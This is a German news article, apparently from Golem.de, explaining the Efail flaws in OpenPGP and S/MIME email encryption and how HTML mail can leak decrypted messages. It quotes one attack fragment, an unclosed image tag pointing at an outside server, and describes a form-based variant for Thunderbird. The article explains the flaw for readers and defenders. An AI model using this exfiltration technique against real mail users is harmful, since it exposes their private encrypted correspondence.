Abo
  • Services:

PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. Ruhrverband, Essen
  2. DLR Deutsches Zentrum für Luft- und Raumfahrt e.V., Braunschweig

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


Anzeige
Hardware-Angebote
  1. 99,90€
  2. (reduzierte Überstände, Restposten & Co.)

mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Mr Miyagi 15. Mai 2018

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...


Folgen Sie uns
       


Openbook ausprobiert: Wie Facebook, nur anders
Openbook ausprobiert
Wie Facebook, nur anders

Seit gut drei Wochen ist das werbe- und trackingfreie soziale Netzwerk Openbook für die Kickstarter-Unterstützer online. Golem.de ist dabei - und freut sich über den angenehmen Umgangston und interessante neue Kontakte.
Ein Test von Tobias Költzsch

  1. Hack Verwaiste Twitter-Konten posten IS-Propaganda
  2. Openbook Open-Source-Alternative zu Facebook versucht es noch einmal
  3. Klage eingereicht Tinder-Mitgründer fordern Milliarden von Mutterkonzern

Cascade Lake AP/SP: Das können Intels Xeon-CPUs mit 56 Kernen
Cascade Lake AP/SP
Das können Intels Xeon-CPUs mit 56 Kernen

Während AMD seine Epyc-Chips mit 64 Cores erst im Sommer 2019 veröffentlichen wird, legt Intel mit den Cascade Lake mit 56 Kernen vor: Die haben mehr Bandbreite, neue Instruktionen für doppelt so schnelle KI-Berechnungen und können persistenten Speicher ansprechen.
Von Marc Sauter

  1. Cascade Lake Intel legt Taktraten der Xeon SP v2 offen
  2. Optane DC Persistent Memory So funktioniert Intels nicht-flüchtiger Speicher
  3. Cascade Lake AP Intel zeigt 48-Kern-CPU für Server

Linux: Wer sind die Debian-Bewerber?
Linux
Wer sind die Debian-Bewerber?

Nach schleppendem Beginn stellen sich vier Kandidaten als Debian Project Leader zur Wahl. Zwei von ihnen kommen aus dem deutschsprachigen Raum und stellen Golem.de ihre Ziele vor.
Von Fabian A. Scherschel

  1. Betriebssystem Debian-Entwickler tritt wegen veralteter Werkzeuge zurück
  2. Linux Debian-Update verhindert Start auf ARM-Geräten
  3. Apt Bug in Debian-Paketmanager feuert Debatte über HTTPS an

    •  /